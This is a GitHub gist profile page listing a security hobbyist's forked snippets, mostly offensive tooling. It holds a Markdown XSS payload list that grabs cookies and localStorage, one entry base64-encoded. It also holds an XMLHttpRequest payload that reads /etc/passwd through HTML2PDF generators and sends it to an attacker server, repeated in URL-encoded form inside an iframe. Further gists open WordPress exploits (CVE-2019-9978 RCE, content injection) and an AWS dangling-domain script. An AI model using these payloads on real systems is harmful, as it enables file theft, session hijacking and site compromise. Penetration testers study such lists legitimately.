Skip to content

Instantly share code, notes, and snippets.

View hehacks's full-sized avatar

heh@cks hehacks

15 followers · 158 following
View GitHub Profile
@hehacks
hehacks / List of API endpoints & objects
Created April 3, 2020 14:57 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@hehacks
hehacks / Markdown XSS fuzzlist
Created April 3, 2020 14:58 — forked from yassineaboukir/Markdown XSS fuzzlist
Source: https://github.com/JakobRPennington/InformationSecurity/tree/master/Payloads/md
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
@hehacks
hehacks / .bash_profile
Created April 3, 2020 15:06 — forked from ehsahil/.bash_profile
Mac OSX Bash Profile
# ---------------------------------------------------------------------------
#
# Description: This file holds all my BASH configurations and aliases
#
# Sections:
# 1. Environment Configuration
# 2. Make Terminal Better (remapping defaults and adding functionality)
# 3. File and Folder Management
# 4. Searching
# 5. Process Management
@hehacks
hehacks / list.txt
Created April 3, 2020 15:08 — forked from ehsahil/list.txt
List of AWS Service Principals
acm.amazonaws.com
alexa-appkit.amazon.com
apigateway.amazonaws.com
application-autoscaling.amazonaws.com
appstream.application-autoscaling.amazonaws.com
appsync.amazonaws.com
athena.amazonaws.com
autoscaling.amazonaws.com
batch.amazonaws.com
channels.lex.amazonaws.com
@hehacks
hehacks / list.txt
Created April 3, 2020 15:08 — forked from shortjared/list.txt
List of AWS Service Principals
acm.amazonaws.com
alexa-appkit.amazon.com
apigateway.amazonaws.com
application-autoscaling.amazonaws.com
appstream.application-autoscaling.amazonaws.com
appsync.amazonaws.com
athena.amazonaws.com
autoscaling.amazonaws.com
batch.amazonaws.com
channels.lex.amazonaws.com
@hehacks
hehacks / poc.md
Created May 13, 2020 12:19 — forked from lc/poc.md
xhr to steal local files in HTML2PDF generators 
x=new XMLHttpRequest;x.onload=function(){l=new XMLHttpRequest;l.open("GET","http://<ATTACKER-SERVER>:1337/"+encodeURIComponent(this.responseText));l.send();};x.open("GET","file:///etc/passwd");x.send();
<iframe src="javascript:%78%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%78%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%68%74%74%70%3a%2f%2f%78%2e%78%78%65%2e%73%68%3a%31%33%33%37%2f%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%29%3b%6c%2e%73%65%6e%64%28%29%3b%7d%3b%78%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%29%3b%78%2e%73%65%6e%64%28%29%3b%0a"></iframe>
@hehacks
hehacks / aws-dangling-domain-discovery-tool.sh
Created June 24, 2020 19:38 — forked from dafthack/aws-dangling-domain-discovery-tool.sh
A proof of concept script for discovering AWS dangling domains
#!/bin/bash
# This script attempts to locate potential dangling domains on AWS. You need AWS CLI installed and your keys configured
# Make sure you insert your Bing API key below as well.
# All the sleeps were necessary to not allocate the same IP address multiple times
while true
do
unset IP
@hehacks
hehacks / gist:158a2953d33d4c40713b72a5cc20d7e8
Created July 8, 2020 11:50 — forked from evilpacket/gist:3628941
Top 1000 from Alexa Top 1million
wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv*
@hehacks
hehacks / CVE-2019-9978.py
Created July 14, 2020 07:59 — forked from budanthara/CVE-2019-9978.py
# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <=3D 3.5.2
# CVE: CVE-2019-9978
@hehacks
hehacks / wordpress_content_injection.py
Created July 14, 2020 07:59 — forked from budanthara/wordpress_content_injection.py
Wordpress content injection exploit by snoww0lf
#! /usr/bin/env python
"""
Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
Wordpress Version Affected: 4.7.0/4.7.1
2017 - Coded by snoww0lf.
"""
import re